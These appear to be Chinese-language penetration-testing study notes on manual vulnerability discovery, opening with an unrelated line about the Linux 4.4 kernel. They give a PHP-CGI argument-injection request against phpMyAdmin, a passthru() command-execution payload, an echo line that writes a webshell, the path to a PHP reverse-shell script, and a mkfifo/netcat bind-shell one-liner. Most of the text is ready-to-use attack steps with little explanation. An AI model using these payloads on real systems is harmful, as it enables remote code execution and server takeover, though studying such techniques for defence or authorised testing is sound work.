linux 4.4内核发布，在虚拟机中可使用主机上的GPU

手动漏洞挖掘

默认安装漏洞

 windows默认安装漏洞

  开放很多服务和端口 权限设置不严 

 phpMyAdmin/setup

  不需要账号密码就能访问

  早期版本phpMyAdmin有漏洞可以远程执行代码

  passthru() php函数，操作系统执行命令

 die() 接下来的代码不执行

 phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

post 提交

 <?

 passthru("执行的命令");

 die();

 ?>

 写入webshell

 echo "<?php \$cmd=\$_GET["cmd"];system(\$cmd); ?>"

 不加 \ 会被过滤

 PHP反弹shell kali有现成的

 /usr/share/webshells/php/php-reverse-shell.php

Ubuntu/Debian 默认安装PHP-cgi

 直接访问/cgi-bin/php5 和 /cgi-bin/php（爬网爬不出）

 调用php执行程序直接执行编码后的php代码

侦听端口 

mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe